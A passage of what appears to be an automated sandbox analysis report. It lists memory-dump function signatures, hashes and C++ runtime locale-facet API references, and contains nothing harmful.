                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                                                  • Instruction ID: 1d6ea0232c3b17981f01e70afe98d97150181f461490c57587651ce70f166d46
                                                                                                                                  • Opcode Fuzzy Hash: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                                                  • Instruction Fuzzy Hash: 99118131951B24ABE520ABF0CC09FCB77AE5FA1708F904D14E29966262DB34F5188EA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1C9D
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1CA7
                                                                                                                                  • int.LIBCPMT ref: 6E8F1CBE
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • numpunct.LIBCPMT ref: 6E8F1CE1
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1CF8
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1D18
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1D25
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3064348918-0
                                                                                                                                  • Opcode ID: 12d335e6f6f7b156dff9692d7761dc7e5c65f9840653dd94bc3b02f4a9dd28ed
                                                                                                                                  • Instruction ID: 25b3e64841940af01c0726f8d2e04ccf7593446a050bdbc4f0793be7161eef49
                                                                                                                                  • Opcode Fuzzy Hash: 12d335e6f6f7b156dff9692d7761dc7e5c65f9840653dd94bc3b02f4a9dd28ed
                                                                                                                                  • Instruction Fuzzy Hash: 6A11A071900619CBCB01DBE8C9547EDBBB9AF85398F244D08D4106B291DF78994B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F76AA
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F76B4
                                                                                                                                  • int.LIBCPMT ref: 6E8F76CB
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F76EE
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7705
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7725
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7732
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7615
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F761F
                                                                                                                                  • int.LIBCPMT ref: 6E8F7636
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F7659
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7670
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7690
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F769D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F6FAE
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F6FB8
                                                                                                                                  • int.LIBCPMT ref: 6E8F6FCF
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • codecvt.LIBCPMT ref: 6E8F6FF2
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7009
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7029
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7036
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F77D4
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F77DE
                                                                                                                                  • int.LIBCPMT ref: 6E8F77F5
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F7818
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F782F
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F784F
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F785C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F6F19
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F6F23
                                                                                                                                  • int.LIBCPMT ref: 6E8F6F3A
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • codecvt.LIBCPMT ref: 6E8F6F5D
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F6F74
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F6F94
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F6FA1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F773F
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7749
                                                                                                                                  • int.LIBCPMT ref: 6E8F7760
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F7783
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F779A
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F77BA
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F77C7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E9054C9
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E9054D3
                                                                                                                                  • int.LIBCPMT ref: 6E9054EA
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E90550D
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E905524
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E905544
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905551
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90555E
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E905568
                                                                                                                                  • int.LIBCPMT ref: 6E90557F
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E9055A2
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9055B9
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E9055D9
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E9055E6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7297
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F72A1
                                                                                                                                  • int.LIBCPMT ref: 6E8F72B8
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • messages.LIBCPMT ref: 6E8F72DB
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F72F2
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7312
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F731F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 958335874-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7ABD
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7AC7
                                                                                                                                  • int.LIBCPMT ref: 6E8F7ADE
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • numpunct.LIBCPMT ref: 6E8F7B01
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7B18
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7B38
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7B45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3064348918-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1ADE
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1AE8
                                                                                                                                  • int.LIBCPMT ref: 6E8F1AFF
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • ctype.LIBCPMT ref: 6E8F1B22
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1B39
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1B59
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1B66
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2958136301-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1A49
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1A53
                                                                                                                                  • int.LIBCPMT ref: 6E8F1A6A
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • codecvt.LIBCPMT ref: 6E8F1A8D
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1AA4
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1AC4
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1AD1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2133458128-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E905275
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E90527F
                                                                                                                                  • int.LIBCPMT ref: 6E905296
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • collate.LIBCPMT ref: 6E9052B9
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9052D0
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E9052F0
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E9052FD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1767075461-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90530A
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E905314
                                                                                                                                  • int.LIBCPMT ref: 6E90532B
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • messages.LIBCPMT ref: 6E90534E
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E905365
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E905385
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905392
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 958335874-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F732C
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7336
                                                                                                                                  • int.LIBCPMT ref: 6E8F734D
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • messages.LIBCPMT ref: 6E8F7370
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7387
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F73A7
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F73B4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 958335874-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7B52
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7B5C
                                                                                                                                  • int.LIBCPMT ref: 6E8F7B73
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • numpunct.LIBCPMT ref: 6E8F7B96
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7BAD
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7BCD
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7BDA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3064348918-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F70D8
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F70E2
                                                                                                                                  • int.LIBCPMT ref: 6E8F70F9
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • collate.LIBCPMT ref: 6E8F711C
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7133
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7153
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7160
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1767075461-0
                                                                                                                                  • Opcode ID: 8dd4ab68795b39779b7de57faeda79ba1cf029777b44b54c1716fdb435393f86
                                                                                                                                  • Instruction ID: d3072330960547199b362faec9aadacbab48c2a9231d1105a0f0f00114bc342f
                                                                                                                                  • Opcode Fuzzy Hash: 8dd4ab68795b39779b7de57faeda79ba1cf029777b44b54c1716fdb435393f86
                                                                                                                                  • Instruction Fuzzy Hash: CE01C031900629DBCB05DBE8C854AEE7B79BF85398F100D19D4106B3D0DF759A4B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7043
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F704D
                                                                                                                                  • int.LIBCPMT ref: 6E8F7064
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • collate.LIBCPMT ref: 6E8F7087
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F709E
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F70BE
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F70CB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1767075461-0
                                                                                                                                  • Opcode ID: 55ef7c9dd6b6de0c4e6d0ac31c61b1e63597cc5dea8ff30398bdeb1729b69e24
                                                                                                                                  • Instruction ID: 264cdc5e337131cf339e9bbeb1742473a471e8911adbd283bd1e28088eed1f31
                                                                                                                                  • Opcode Fuzzy Hash: 55ef7c9dd6b6de0c4e6d0ac31c61b1e63597cc5dea8ff30398bdeb1729b69e24
                                                                                                                                  • Instruction Fuzzy Hash: 6D01C071900629CBDB01DBE8C954AEEB7B9AF85398F210D09D410AB2C0DF759A4B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7202
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F720C
                                                                                                                                  • int.LIBCPMT ref: 6E8F7223
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • ctype.LIBCPMT ref: 6E8F7246
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F725D
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F727D
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F728A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2958136301-0
                                                                                                                                  • Opcode ID: 1f127ce60920df6713edb1541b961e929026db84eb92eb12b029d0ae222fcbec
                                                                                                                                  • Instruction ID: e247fed4c3f7dca50aa7dbcf80a409e2c6dd58ccca5fd89bf62d336557d77251
                                                                                                                                  • Opcode Fuzzy Hash: 1f127ce60920df6713edb1541b961e929026db84eb92eb12b029d0ae222fcbec
                                                                                                                                  • Instruction Fuzzy Hash: 3401C03190061ACFDF01DBE8C954AED777ABF953A8F104D09E4116B2C0EFB49A4B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F716D
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7177
                                                                                                                                  • int.LIBCPMT ref: 6E8F718E
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • ctype.LIBCPMT ref: 6E8F71B1
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F71C8
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F71E8
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F71F5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2958136301-0
                                                                                                                                  • Opcode ID: 61883fc5aa5009a8ff41e77d5df48e72ef902dad1a2e25938c11b7e42595240e
                                                                                                                                  • Instruction ID: 66861b4c4daa53462445daf66dd568f8a41f57f35afe14351c776ccdc441471b
                                                                                                                                  • Opcode Fuzzy Hash: 61883fc5aa5009a8ff41e77d5df48e72ef902dad1a2e25938c11b7e42595240e
                                                                                                                                  • Instruction Fuzzy Hash: 30010031900619CBDF01DBE8C954AEDBBBAAF91398F114D09D4106B2C0DF709A4B8B80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A31A24(intOrPtr _a4) {
